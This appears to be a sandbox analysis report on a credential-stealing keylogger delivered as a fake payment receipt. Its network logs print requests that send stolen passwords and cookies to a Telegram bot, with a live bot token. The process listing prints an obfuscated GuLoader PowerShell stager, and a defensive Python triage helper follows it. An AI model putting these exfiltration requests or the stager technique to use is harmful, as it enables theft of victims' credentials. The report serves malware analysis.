2024-12-16 17:29:03 UTC  85 bytes  OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-16 17:29:03 UTC  878 bytes  IN
HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 17:29:03 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 358912
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N0BZb7nhZDFqbpFOxHcP7cknsixB8HV%2BL%2BNpPIlm2aJNOVtmnF9WvJXzP0kKbRzJ664dAhIK9hSzIhEKrdxLtU2WKmO1iF2Cu6gM0zXekeM1UgOgc8%2FCMWxckAUeiBR%2BaJm5Bhkd"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3064b598b91895-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1548&min_rtt=1506&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1938911&cwnd=185&unsent_bytes=0&cid=f60fa39cb6530410&ts=492&x=0"
2024-12-16 17:29:03 UTC  362 bytes  IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49765 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 8012 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 17:29:06 UTC  85 bytes  OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-16 17:29:07 UTC  873 bytes  IN
HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 17:29:06 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 358915
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMflAgBK5WLbNKB4s6m7NtaQhGmxOKGzj8XOrmESD605vFNingEbTkSNsDaHCxgCcRmPSTKRha9SXOOu%2BOUjPqNeL7K9m9Hw8d9QKp9faeYsSgvlkhpjKIz%2FL8fkiJVcLoiFi4xD"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3064ca4d3a4285-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2079&min_rtt=2074&rtt_var=789&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1377358&cwnd=32&unsent_bytes=0&cid=e432ecc6fc76dc0a&ts=461&x=0"
2024-12-16 17:29:07 UTC  362 bytes  IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49774 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 8012 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 17:29:09 UTC  85 bytes  OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-16 17:29:10 UTC  884 bytes  IN
HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 17:29:09 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 358918
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pHutBL6vVWmtm7%2BKy06oFXu5CzM7XGYa6vio2slT9zx96OafJoqJC3RyleTTcAWRVlF4qCUGkN7iaPtT%2BjKahfwiTk90ofOMgYcryEVKWT8jt2a%2Fy0sp%2B%2BiQPrK4%2FaIjPv%2FjAjlR"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3064dd4f995e76-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1593&rtt_var=610&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1773997&cwnd=209&unsent_bytes=0&cid=faad9e1842dd164c&ts=463&x=0"
2024-12-16 17:29:10 UTC  362 bytes  IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49781 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 8012 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 17:29:12 UTC  61 bytes  OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2024-12-16 17:29:13 UTC  876 bytes  IN
HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 17:29:13 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 358922
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YqTNPtvq7CN2ci2xpoP6Pky8IaC9M4VFf8ghtjrMu7ThHrTO9Q44QM%2F698VS1rhwF4W%2FrD%2FTSiw7NzHZompby85rGEFqld7ZPSnsSZoctUeYW0PiQA4jAaZ8RY3efJ8aTLkUACF2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3064f02ea34282-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1616&rtt_var=635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1684939&cwnd=252&unsent_bytes=0&cid=65632a1305f2602a&ts=474&x=0"
2024-12-16 17:29:13 UTC  362 bytes  IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49792 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 8012 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 17:29:15 UTC  85 bytes  OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-16 17:29:16 UTC  874 bytes  IN
HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 17:29:16 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 358925
Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGh0fSy95ob3gr4TQ%2F8GT24loQF583FwIrlhr3L3tGI9iua3m3uzOz7f0JMnXbVQxArdCPUOGvTNuGabo0ADstJFrx8SKVTCWkSPLKFRfuCNC2zjwOMXvx%2B58xP0jZyrvM0sGER6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3065047de0c3fa-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1696&min_rtt=1552&rtt_var=870&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1079881&cwnd=186&unsent_bytes=0&cid=ab05547a35041ed5&ts=708&x=0"
2024-12-16 17:29:16 UTC  362 bytes  IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 10  Source IP: 192.168.2.4  Source Port: 49800  Destination IP: 104.21.67.152  Destination Port: 443  PID: 8012  Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-16 17:29:18 UTC  85 bytes  OUT  GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-16 17:29:19 UTC  872 bytes  IN  HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 17:29:19 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 358928
    Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gA6o6p1FmlU8ANwu3fCCa41d1A0Ab87TzLYKDvHuXWPkLMbIlFzKJqrwNeEhIhuYERFZOEKRjD89wOCrBNzJT3W70DliR7q5oYLnf591X8hhz6Cl1uZxXkzgl%2BlEVZUUiZRDmMtv"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f3065176b130f64-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1493&rtt_var=571&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1899804&cwnd=233&unsent_bytes=0&cid=3cc0a6c69936cb0c&ts=481&x=0"
2024-12-16 17:29:19 UTC  362 bytes  IN  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 11  Source IP: 192.168.2.4  Source Port: 49806  Destination IP: 149.154.167.220  Destination Port: 443  PID: 8012  Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-16 17:29:21 UTC  349 bytes  OUT  GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20and%20Time:%2017/12/2024%20/%2019:35:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20065367%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2024-12-16 17:29:21 UTC  344 bytes  IN  HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Mon, 16 Dec 2024 17:29:21 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 17:29:21 UTC  55 bytes  IN  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID: 12  Source IP: 192.168.2.4  Source Port: 49825  Destination IP: 149.154.167.220  Destination Port: 443  PID: 8012  Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-16 17:29:29 UTC  344 bytes  OUT  POST /bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
    Content-Type: multipart/form-data; boundary=------------------------8dd1f5b7140c899
    Host: api.telegram.org
    Content-Length: 581
2024-12-16 17:29:29 UTC  581 bytes  OUT  Data Ascii: --------------------------8dd1f5b7140c899Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:065367Date and Time: 16/12/2024 / 12:28:49
2024-12-16 17:29:29 UTC  388 bytes  IN  HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Mon, 16 Dec 2024 17:29:29 GMT
    Content-Type: application/json
    Content-Length: 526
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 17:29:29 UTC  526 bytes  IN  Data Ascii: {"ok":true,"result":{"message_id":319,"from":{"id":7884953123,"is_bot":true,"first_name":"Mazi","username":"emmasouthbot"},"chat":{"id":5234817354,"first_name":"Api","last_name":"South","username":"sout098","type":"private"},"date":1734370169,"document":{


Session ID: 13  Source IP: 192.168.2.4  Source Port: 49833  Destination IP: 149.154.167.220  Destination Port: 443  PID: 8012  Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-16 17:29:32 UTC  374 bytes  OUT  POST /bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
    Content-Type: multipart/form-data; boundary=------------------------8dd1f89892680e0
    Host: api.telegram.org
    Content-Length: 7046
    Connection: Keep-Alive
2024-12-16 17:29:32 UTC  7046 bytes  OUT  Data Ascii: --------------------------8dd1f89892680e0Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:065367Date and Time: 16/12/2024 /
2024-12-16 17:29:33 UTC  388 bytes  IN  HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Mon, 16 Dec 2024 17:29:33 GMT
    Content-Type: application/json
    Content-Length: 539
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 17:29:33 UTC  539 bytes  IN  Data Ascii: {"ok":true,"result":{"message_id":320,"from":{"id":7884953123,"is_bot":true,"first_name":"Mazi","username":"emmasouthbot"},"chat":{"id":5234817354,"first_name":"Api","last_name":"South","username":"sout098","type":"private"},"date":1734370173,"document":{



Target ID: 0
Start time: 12:27:57
Start date: 16/12/2024
Path: C:\Users\user\Desktop\Justificante pago-09453256434687.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Justificante pago-09453256434687.exe"
Imagebase: 0x400000
File size: 1'106'880 bytes
MD5 hash: 4252CD5753DEF4A484FB3313E1029E66
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 12:28:00
Start date: 16/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) "
Imagebase: 0xd20000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2067270709.0000000009B22000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

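The PowerShell command line above is the GuLoader stager's indirection trick: it reads the dropped Forhaandsudtalelses.Pot162 file with Get-Content -Raw, slices three characters out of it at character offset 68150, and uses the dot-call operator (.$var(...)) to invoke whatever command those three characters spell, handing the entire file back in as the argument. The command line itself therefore never names the cmdlet it runs, so triage has to recover it from the dropped file. The following is an added triage helper, not Joe Sandbox output or anything from the sample: it parses the stager shape (accepting the gc, cat, type and Get-Content spellings), emulates the SubString call on the file text and returns the command name. The sample file is constructed here, with "iex" placed at the offset as an assumption about what such stagers usually invoke; the report does not show the real file's contents. The cp1252 fallback for files without a BOM is likewise an assumption about the analysis host's ANSI code page.

```python
"""Triage helper for the gc -raw / SubString / dot-call PowerShell stager pattern."""
import re
from typing import NamedTuple, Optional

# gc, cat and type are the built-in Windows PowerShell aliases of Get-Content.
STAGER_RE = re.compile(
    r"\$(?P<blob>\w+)\s*=\s*(?:gc|cat|type|Get-Content)\s+-raw\s+'(?P<path>[^']+)'\s*;"
    r"\s*\$(?P<cmd>\w+)\s*=\s*\$(?P=blob)\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)\s*;"
    r"\s*\.\s*\$(?P=cmd)\s*\(\s*\$(?P=blob)\s*\)",
    re.IGNORECASE,
)


class StagerIndirection(NamedTuple):
    path: str     # dropped file that is both the script body and the command name
    offset: int   # character offset handed to SubString
    length: int   # number of characters taken


def parse_stager(cmdline: str) -> Optional[StagerIndirection]:
    """Return the indirection parameters if cmdline has the stager shape, else None."""
    m = STAGER_RE.search(cmdline)
    if m is None:
        return None
    return StagerIndirection(m["path"], int(m["off"]), int(m["len"]))


def decode_like_get_content(raw: bytes) -> str:
    """Decode roughly as Get-Content -Raw would: honour a BOM, else use ANSI.

    SubString indexes decoded *characters*, not bytes, so decoding the file
    the wrong way shifts the offset whenever the blob contains non-ASCII bytes.
    cp1252 as the no-BOM fallback is an assumption (en-US system code page).
    """
    if raw.startswith(b"\xef\xbb\xbf"):
        return raw.decode("utf-8-sig")
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")          # BOM selects endianness and is stripped
    return raw.decode("cp1252", errors="replace")


def resolve_command(raw: bytes, ind: StagerIndirection) -> str:
    """Emulate $blob.SubString(offset, length) on the decoded file text."""
    text = decode_like_get_content(raw)
    if ind.offset + ind.length > len(text):
        raise ValueError("SubString range exceeds file length: wrong file or wrong decoding")
    return text[ind.offset: ind.offset + ind.length]


def triage(cmdline: str, raw: bytes) -> Optional[dict]:
    """Combine both steps: what file, what offset, and which command actually runs."""
    ind = parse_stager(cmdline)
    if ind is None:
        return None
    return {"path": ind.path, "offset": ind.offset, "length": ind.length,
            "command": resolve_command(raw, ind)}


# Constructed stand-in for the dropped .Pot162 file: padding up to the offset,
# then the three-character token the stager slices out. "iex" is an assumption.
def build_sample_blob(offset: int, token: str = "iex") -> bytes:
    body = "#" * offset + token + "\r\n# remainder of the script body would follow\r\n"
    return body.encode("cp1252")


# The command line from this report (Target ID 1 process above).
CMDLINE = (
    r"powershell.exe -windowstyle hidden "
    r'"$Subwayed=gc -raw '
    r"'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';"
    r'$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) "'
)

if __name__ == "__main__":
    ind = parse_stager(CMDLINE)
    print(ind)
    print("invoked command:", resolve_command(build_sample_blob(ind.offset), ind))
```

In a real investigation the bytes passed to resolve_command come from the dropped file recovered from the sandbox or the host; the file is then the actual payload to analyse, since the stager hands all of it to the resolved command. A ValueError from the length check is itself a useful signal that the wrong file, or a re-encoded copy of it, is being examined.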
Target ID: 2
Start time: 12:28:00
Start date: 16/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 12:28:34
Start date: 16/12/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\msiexec.exe"
Imagebase: 0x9a0000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false


Execution Graph

Execution Coverage: 22.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 17%
Total number of Nodes: 1383
Total number of Limit Nodes: 34

[Execution graph node and edge data not reproduced: the rendered call graph of the sample, with nodes labelled by code addresses and the Win32 APIs they reach (among them FindFirstFileW, lstrcpynW, CreateFileW, ReadFile, WriteFile, SetFilePointer, GetProcAddress, LoadLibraryExW, GetTempPathW, SetEnvironmentVariableW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges and ExitProcess). The graph is truncated in this copy of the page.]
403913 3811 405ad2 5 API calls 3805->3811 3810 4068d4 5 API calls 3807->3810 3808->3807 3813 4038de 3809->3813 3814 403a9d 3810->3814 3815 403918 lstrcatW 3811->3815 3812->3804 3812->3805 3813->3789 3942 406507 lstrcpynW 3813->3942 3816 403ab2 ExitWindowsEx 3814->3816 3821 403abf 3814->3821 3817 403934 lstrcatW lstrcmpiW 3815->3817 3818 403929 lstrcatW 3815->3818 3816->3802 3816->3821 3817->3789 3819 403954 3817->3819 3818->3817 3822 403960 3819->3822 3823 403959 3819->3823 3825 40140b 2 API calls 3821->3825 3827 405ab5 2 API calls 3822->3827 3826 405a38 4 API calls 3823->3826 3824 4038f1 3943 406507 lstrcpynW 3824->3943 3825->3802 3829 40395e 3826->3829 3830 403965 SetCurrentDirectoryW 3827->3830 3829->3830 3831 403982 3830->3831 3832 403977 3830->3832 3945 406507 lstrcpynW 3831->3945 3944 406507 lstrcpynW 3832->3944 3835 406544 17 API calls 3836 4039c4 